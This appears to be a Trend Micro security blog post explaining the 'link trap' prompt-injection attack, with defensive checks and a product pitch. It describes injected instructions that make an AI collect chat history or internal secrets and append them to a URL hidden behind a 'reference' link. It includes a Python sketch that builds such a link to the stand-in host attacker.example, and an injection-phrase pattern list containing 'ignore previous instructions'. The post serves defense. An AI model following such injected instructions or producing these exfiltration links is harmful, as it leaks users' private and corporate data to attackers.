TrendMicro

Link Trap: GenAI Prompt Injection Attack

Step 1: Request with prompt injection content

The prompt received by the AI includes not only the user’s original query but also malicious instructions. The characteristics of this prompt injection content may include the following:

  1. Requesting AI to Collect Sensitive Data:
    1. For public generative AI, this might involve collecting the user’s chat history, which can contain Personally Identifiable Information (PII), personal plans, or schedules.
    2. For private generative AI, the scope of the impact could be more extensive. For example, the AI might be instructed to search for internal passwords or confidential internal documents that the company has provided to the AI for reference.
  2. Providing a URL and Instructing AI to Append Collected Data:
    1. The AI might be given a URL and instructed to append the collected sensitive data to the URL.
    2. The injected instructions may also require the AI to hide the complete URL behind a hyperlink, displaying only innocuous text like “reference” to the user, thereby reducing the user’s suspicion.
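
To make concrete what defenders should look for, the following is a minimal sketch of the kind of link such instructions ask the AI to produce. It assumes the chat interface renders Markdown; the host attacker.example, the query parameter q, and the function build_trap_link are all hypothetical names chosen for illustration and do not come from an observed attack.

```python
from urllib.parse import urlencode


def build_trap_link(base_url: str, collected: str, label: str = "reference") -> str:
    """Return a Markdown link whose visible text hides the data-carrying URL."""
    # urlencode percent-encodes the collected text so it survives in a query string.
    query = urlencode({"q": collected})  # "q" is an assumed parameter name
    return f"[{label}]({base_url}?{query})"


# Hypothetical attacker endpoint and sample data, for illustration only.
link = build_trap_link("https://attacker.example/collect", "user plans: Tokyo, 12 May")
print(link)
```

When rendered, the user sees only the word “reference”, while the full URL, including the encoded data, is sent to the remote host as soon as the link is opened.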

Step 2: Response with URL trap

At this stage, the user might receive an AI response containing a URL that leads to the leakage of information. Once the user clicks the link, the information is sent to a remote attacker. Attackers might craft the AI’s response with the following features to increase the success rate of the attack:

  1. Incorporating Normal Responses to Gain Trust:
    • To earn the user’s trust, the AI’s response may still include a normal answer to the user’s query. For example, in a scenario where the user asks for information about Japan, the AI would provide accurate information about Japan, making the user unaware of any abnormality.
  2. Embedding a Hyperlink Containing Confidential Information:
    • At the end of the response, there will be a hyperlink containing the confidential information. This link might be displayed with innocuous text like “reference” or other reassuring phrases, encouraging the user to click on it. Once the user clicks the link, the confidential information is transmitted to the attacker.
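
The two features above suggest a simple check on the AI’s response before it is shown to the user. The sketch below is a heuristic only, assuming Markdown-formatted responses: it flags links whose visible text does not reveal the target host and whose URL carries a query string. The function name find_suspicious_links and the threshold parameter are illustrative assumptions, and a real filter would need to handle other link syntaxes and data hidden in the URL path.

```python
import re
from urllib.parse import urlsplit

# Matches inline Markdown links of the form [text](http(s)://url).
MD_LINK = re.compile(r"\[([^\]]+)\]\((https?://[^\s)]+)\)")


def find_suspicious_links(response: str, max_query_len: int = 0) -> list[tuple[str, str]]:
    """Return (visible_text, url) pairs for links that hide a data-carrying URL."""
    suspicious = []
    for text, url in MD_LINK.findall(response):
        parts = urlsplit(url)
        hides_url = parts.netloc not in text          # visible text does not show the host
        carries_data = len(parts.query) > max_query_len  # query string longer than allowed
        if hides_url and carries_data:
            suspicious.append((text, url))
    return suspicious


sample = (
    "Japan is an island country in East Asia. "
    "[reference](https://attacker.example/c?q=secret+plan) "
    "See also [https://example.org/docs](https://example.org/docs)."
)
flagged = find_suspicious_links(sample)
```

In this sample, only the link labeled “reference” is flagged; the second link shows its own target and carries no query string.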

What’s the difference?

In general, for a prompt injection attack to cause significant damage, the AI needs to be granted corresponding permissions, such as writing to a database, calling APIs, interacting with external systems, sending emails, or placing orders. Therefore, it is commonly believed that restricting the AI’s permissions can effectively control the scope of incidents when the AI is attacked. However, the “link trap” scenario differs from this common understanding.

In the scenario we introduced, even if we do not grant the AI any additional permissions to interact with the outside world and only allow the AI to perform basic functions like responding to or summarizing received information and queries, it is still possible for sensitive data to be leaked. This type of attack cleverly leverages the user’s capabilities, delegating the final step of data upload to the user, who inherently has higher permissions. The AI itself is responsible for dynamically collecting information.

Securing your AI journey

Beyond relying on the GenAI service’s own safeguards against such attacks, here are some protective measures you can take:

  • Inspect the Final Prompt Sent to the AI: Ensure that the prompt does not contain malicious prompt injection content that could instruct the AI to collect information and generate such malicious links.
  • Exercise Caution with URLs in AI Responses: If the AI’s response includes a URL, be extra cautious. It is best to verify the target URL before opening it to ensure it is from a trusted source.
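
Both measures can be partly automated. The following is a rough sketch, not a complete defense: the phrase patterns in INJECTION_PATTERNS and the hosts in TRUSTED_HOSTS are assumptions chosen for illustration, and keyword matching of this kind is easy to evade, so it should complement rather than replace dedicated prompt injection detection.

```python
import re
from urllib.parse import urlsplit

# Hypothetical phrases that may accompany link-trap injections; not exhaustive.
INJECTION_PATTERNS = [
    re.compile(r"append .{0,80}(to|onto) (the|this) (url|link)", re.I),
    re.compile(r"(hide|display|show) .{0,80}(as|behind) .{0,40}(hyperlink|link|text)", re.I),
    re.compile(r"ignore (all |any )?(previous|prior) instructions", re.I),
]

# Example allowlist of hosts the organization trusts (an assumption).
TRUSTED_HOSTS = {"www.trendmicro.com", "example.org"}


def prompt_looks_injected(prompt: str) -> bool:
    """Return True if the final prompt matches any known injection phrasing."""
    return any(p.search(prompt) for p in INJECTION_PATTERNS)


def is_trusted_url(url: str) -> bool:
    """Return True only for HTTPS URLs whose host is on the allowlist."""
    parts = urlsplit(url)
    return parts.scheme == "https" and parts.hostname in TRUSTED_HOSTS
```

For example, a prompt that asks the AI to collect the chat history and append it to a URL would be flagged by prompt_looks_injected, and a link to a host outside TRUSTED_HOSTS would be rejected by is_trusted_url before the user opens it.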

Zero Trust Secure Access

Trend Vision One™ ZTSA – AI Service Access enables zero trust access control for public and private GenAI services. It can monitor AI usage and inspect GenAI prompts and responses, identifying, filtering, and analyzing AI content to avoid potential sensitive data leakage or unsecured outputs in public and private cloud environments. It runs advanced prompt injection detection to mitigate the risk of potential manipulation from GenAI services. It also implements trust-based, least-privilege access control across the internet. You can use ZTSA to interact securely with GenAI services. More information about ZTSA can be found here.
